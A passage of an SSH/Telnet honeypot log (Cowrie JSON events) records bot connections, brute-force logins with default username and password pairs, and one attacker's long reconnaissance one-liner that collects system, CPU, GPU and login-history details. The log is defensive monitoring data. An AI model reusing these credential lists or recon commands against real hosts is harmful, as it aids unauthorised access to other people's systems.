penssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:33:26.235886Z","src_ip":"51.79.164.132","session":"ea4d17f29b07"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:33:27.996990Z","src_ip":"51.79.164.132","session":"ea4d17f29b07"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:33:29.372288Z","src_ip":"47.121.133.27","session":"b8eec5a11144"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:33:29.520887Z","src_ip":"51.79.164.132","session":"ea4d17f29b07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:33:33.643314Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.643991Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.644682Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.645722Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.646748Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.647543Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.648558Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.649417Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.649940Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.650636Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.651206Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.651937Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:33:33.652377Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:33:35.552414Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:33:35.553464Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.session.closed","duration":"31.5","message":"Connection lost after 31.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:33:35.554470Z","src_ip":"212.227.125.160","session":"d10966712e3a"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":44898,"dst_ip":"1.2.3.4","dst_port":22,"session":"92e20fba25fd","protocol":"ssh","message":"New connection: 51.79.164.132:44898 (1.2.3.4:22) [session: 92e20fba25fd]","sensor":"my-vps","timestamp":"2025-08-28T08:33:52.042488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:33:52.432411Z","src_ip":"51.79.164.132","session":"92e20fba25fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:33:52.433346Z","src_ip":"51.79.164.132","session":"92e20fba25fd"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:33:54.371872Z","src_ip":"51.79.164.132","session":"92e20fba25fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:33:55.491282Z","src_ip":"51.79.164.132","session":"92e20fba25fd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:33:55.492042Z","src_ip":"51.79.164.132","session":"92e20fba25fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:33:55.870006Z","src_ip":"51.79.164.132","session":"92e20fba25fd"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:33:55.871242Z","src_ip":"51.79.164.132","session":"92e20fba25fd"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":34850,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b7cdbc82f9d","protocol":"ssh","message":"New connection: 51.79.164.132:34850 (1.2.3.4:22) [session: 8b7cdbc82f9d]","sensor":"my-vps","timestamp":"2025-08-28T08:34:18.367450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:34:18.491992Z","src_ip":"51.79.164.132","session":"8b7cdbc82f9d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:34:18.982723Z","src_ip":"51.79.164.132","session":"8b7cdbc82f9d"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-28T08:34:20.518579Z","src_ip":"51.79.164.132","session":"8b7cdbc82f9d"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:34:22.016571Z","src_ip":"51.79.164.132","session":"8b7cdbc82f9d"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":43454,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d31d73ffa45","protocol":"ssh","message":"New connection: 51.79.164.132:43454 (1.2.3.4:22) [session: 6d31d73ffa45]","sensor":"my-vps","timestamp":"2025-08-28T08:34:44.736687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:34:44.958593Z","src_ip":"51.79.164.132","session":"6d31d73ffa45"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:34:44.960972Z","src_ip":"51.79.164.132","session":"6d31d73ffa45"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-28T08:34:47.117353Z","src_ip":"51.79.164.132","session":"6d31d73ffa45"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:34:48.491326Z","src_ip":"51.79.164.132","session":"6d31d73ffa45"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.184","src_port":59314,"dst_ip":"1.2.3.4","dst_port":23,"session":"9e18482bfe6a","protocol":"telnet","message":"New connection: 205.210.31.184:59314 (1.2.3.4:23) [session: 9e18482bfe6a]","sensor":"my-vps","timestamp":"2025-08-28T08:35:08.378065Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:35:11.392698Z","src_ip":"176.65.149.186","session":"7d3442735ae6"}
{"eventid":"cowrie.session.closed","duration":180.44409608840942,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:35:11.396130Z","src_ip":"176.65.149.186","session":"7d3442735ae6"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":36816,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3f976ad4f8e","protocol":"ssh","message":"New connection: 51.79.164.132:36816 (1.2.3.4:22) [session: f3f976ad4f8e]","sensor":"my-vps","timestamp":"2025-08-28T08:35:12.955932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:35:13.842723Z","src_ip":"51.79.164.132","session":"f3f976ad4f8e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:35:13.843490Z","src_ip":"51.79.164.132","session":"f3f976ad4f8e"}
{"eventid":"cowrie.session.closed","duration":9.791097164154053,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:35:18.169094Z","src_ip":"205.210.31.184","session":"9e18482bfe6a"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:35:18.685569Z","src_ip":"51.79.164.132","session":"f3f976ad4f8e"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:35:20.995019Z","src_ip":"51.79.164.132","session":"f3f976ad4f8e"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":42786,"dst_ip":"1.2.3.4","dst_port":22,"session":"320024015d12","protocol":"ssh","message":"New connection: 185.93.89.7:42786 (1.2.3.4:22) [session: 320024015d12]","sensor":"my-vps","timestamp":"2025-08-28T08:35:21.499027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:35:21.542832Z","src_ip":"185.93.89.7","session":"320024015d12"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:35:21.543543Z","src_ip":"185.93.89.7","session":"320024015d12"}
{"eventid":"cowrie.login.success","username":"root","password":"index","message":"login attempt [root/index] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:35:21.736188Z","src_ip":"185.93.89.7","session":"320024015d12"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:35:21.788934Z","src_ip":"185.93.89.7","session":"320024015d12"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":56920,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3cc3cbb3c29","protocol":"ssh","message":"New connection: 185.93.89.7:56920 (1.2.3.4:22) [session: a3cc3cbb3c29]","sensor":"my-vps","timestamp":"2025-08-28T08:35:30.979774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:35:30.980900Z","src_ip":"185.93.89.7","session":"a3cc3cbb3c29"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-